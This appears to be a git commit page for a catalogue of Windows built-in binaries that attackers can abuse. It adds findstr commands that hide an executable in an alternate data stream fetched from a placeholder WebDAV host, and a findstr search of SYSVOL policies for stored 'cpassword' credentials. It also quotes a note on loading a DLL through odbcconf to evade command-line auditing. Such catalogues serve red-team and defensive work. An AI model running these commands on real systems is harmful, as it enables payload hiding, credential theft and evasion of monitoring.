Added and adjusted

master
api0cradle 2018-04-20 15:31:50 +02:00
parent d3403eae69
commit dea250c754
7 changed files with 41 additions and 4 deletions

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
"notes.txt"

View File

@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
## Binary.exe ## Binary.exe
* Functions: Execute * Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search
``` ```
Example Example

View File

@ -40,6 +40,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Regasm.exe](OSBinaries/Regasm.md) [Regasm.exe](OSBinaries/Regasm.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md) [Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md) [Regsvr32.exe](OSBinaries/Regsvr32.md)
[Robocopy.exe](OSBinaries/Robocopy.md)
[Replace.exe](OSBinaries/Replace.md) [Replace.exe](OSBinaries/Replace.md)
[Rundll32.exe](OSBinaries/Rundll32.md) [Rundll32.exe](OSBinaries/Rundll32.md)
[Runscripthelper.exe](OSBinaries/Runscripthelper.md) [Runscripthelper.exe](OSBinaries/Runscripthelper.md)

View File

@ -1,11 +1,13 @@
## Findstr.exe ## Findstr.exe
* Functions: Add ADS * Functions: Add ADS, Search
``` ```
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
``` ```
Acknowledgements: Acknowledgements:

View File

@ -16,6 +16,7 @@ Code sample:
Resources: Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses * https://github.com/woanware/application-restriction-bypasses
* https://twitter.com/subTee/status/789459826367606784
Full path: Full path:
``` ```
@ -24,6 +25,9 @@ c:\windows\sysWOW64\odbcconf.exe
``` ```
Notes: Notes:
Samples can be found in the resources. Text from @subtee tweet:
```
Loads Dll from path in my.rsp.
Hide from command line auditing watching for regsvr32
```

28
OSBinaries/Robocopy.md Normal file
View File

@ -0,0 +1,28 @@
## Robocopy.exe
* Functions: Copy
```
Robocopy.exe - Needs example
```
Acknowledgements:
* Name of guy - @twitterhandle
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://linktosomethingusefull.com
Full path:
```
c:\windows\system32\binary.exe
c:\windows\sysWOW64\binary.exe
```
Notes:
Some specific details about the binary file.

1
notes.txt Normal file
View File

@ -0,0 +1 @@
test